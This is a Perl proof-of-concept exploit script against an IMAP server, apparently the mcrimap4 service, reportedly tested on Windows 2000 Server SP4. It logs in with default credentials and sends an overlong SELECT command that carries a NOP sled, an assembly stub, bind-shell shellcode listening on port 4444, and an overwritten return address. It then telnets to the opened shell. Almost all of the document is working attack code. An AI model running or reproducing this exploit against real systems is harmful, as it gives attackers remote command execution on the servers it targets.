#!/bin/perl # tested on win2k server SP4 English # ATTENTION! If you have an another valid account you must change the offsets this is only a poc # use IO::Socket::INET; my $host = shift(@ARGV); my $port = 143; my $reply; my $request; my $user = "test"; my $pass = "test"; my $nop = "\x90"x8; my $nop1 = "\x90"x20; my $ret = "\x42\xb2\xc1\x40"; #my $ret = "\x42\x42\x42\x42"; #call edi in mcrimap4.exe my $asm="\x8b\xc7\x83\xc0\x23\x50\xc3"; # asm is a binary translation of these assembly instructions;eax now have the correct memory address for shellcode # # 8BC7 MOV EAX,EDI # 83C0 23 ADD EAX,23 # 50 PUSH EAX # C3 RETN #A binary translation of NGS Writing Small Shellcode by Dafydd Stuttard with only two little differences #1)bind port, in this exploit is 4444 in the original shellcode was 6666 #2)4 bytes added to the shellcode in order not to see the window of cmd.exe on remote host my $shellcode = "\x59\x81\xc9\xd3\x62\x30\x20\x41\x43\x4d\x64". "\x64\x99\x96\x8D\x7E\xE8\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B\x49\x1C". "\x8B\x09\x8B\x69\x08\xB6\x03\x2B\xE2\x66\xBA\x33\x32\x52\x68\x77". "\x73\x32\x5F\x54\xAC\x3C\xD3\x75\x06\x95\xFF\x57\xF4\x95\x57\x60". "\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59\x20\x03\xDD\x33\xFF". "\x47\x8B\x34\xBB\x03\xF5\x99\xAC\x34\x71\x2A\xD0\x3C\x71\x75\xF7". "\x3A\x54\x24\x1C\x75\xEA\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B". "\x59\x1C\x03\xDD\x03\x2C\xBB\x95\x5F\xAB\x57\x61\x3B\xF7\x75\xB4". "\x5E\x54\x6A\x02\xAD\xFF\xD0\x88\x46\x13\x8D\x48\x30\x8B\xFC\xF3". "\xAB\x40\x50\x40\x50\xAD\xFF\xD0\x95\xB8\x02\xFF\x11\x5c\x32\xE4". "\x50\x54\x55\xAD\xFF\xD0\x85\xC0\x74\xF8\xFE\x44\x24\x2D\xFE\x44". "\x24\x2c\x83\xEF\x6C\xAB\xAB\xAB\x58\x54\x54\x50\x50\x50\x54\x50". "\x50\x56\x50\xFF\x56\xE4\xFF\x56\xE8"; my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = "a001 LOGIN $user $pass\r\n"; send $socket, $request, 0; print "[+] Sent login\n"; recv($socket, $reply, 1024, 0); print "Response:" . $reply; $request = " SELECT " . $nop . $asm . $nop1 . $shellcode . $ret ."\r\n"; send $socket, $request, 0; print "[+] Sent chunk\n"; print " + Connect on port 4444 of $host ...\n"; system("telnet $host 4444"); close $socket; exit;